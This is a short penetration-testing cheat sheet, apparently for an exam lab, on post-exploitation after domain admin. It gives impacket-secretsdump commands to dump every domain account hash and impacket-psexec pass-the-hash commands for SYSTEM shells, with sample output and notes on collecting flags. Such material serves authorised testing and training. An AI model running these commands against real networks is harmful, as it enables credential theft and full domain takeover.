POST-EXPLOITATION (AFTER DA)
Dump all hashes
Every account hash in domain — Complete compromise
impacket-secretsdump <domain>/Administrator@<DC_IP> -hashes :<hash>
Example Output
impacket-secretsdump corp.local/Administrator@10.10.10.5 -hashes :31d6cfe...
Administrator:500:aad3b...:31d6cfe...
krbtgt:502:aad3b...:f3bc61...
john.smith:1001:aad3b...:8846f7...
(1247 accounts dumped - full domain compromise)
Access any machine
SYSTEM on any domain machine — Prove impact for report
impacket-psexec <domain>/Administrator@<target> -hashes :<hash>
Example Output
impacket-psexec corp.local/Administrator@10.10.10.20 -hashes :31d6cfe...
C:\Windows\system32> whoami
nt authority\system
(SYSTEM on any machine in the domain)
Flag collection
Exam flag files — Screenshot with whoami & ipconfig
type C:\Users\Administrator\Desktop\proof.txt
type C:\Users\<user>\Desktop\local.txt
Example Output
type C:\Users\Administrator\Desktop\proof.txt
<flag_hash_here>
SCREENSHOT MUST INCLUDE:
- The flag content
- whoami output
- ipconfig output
- All in same terminal window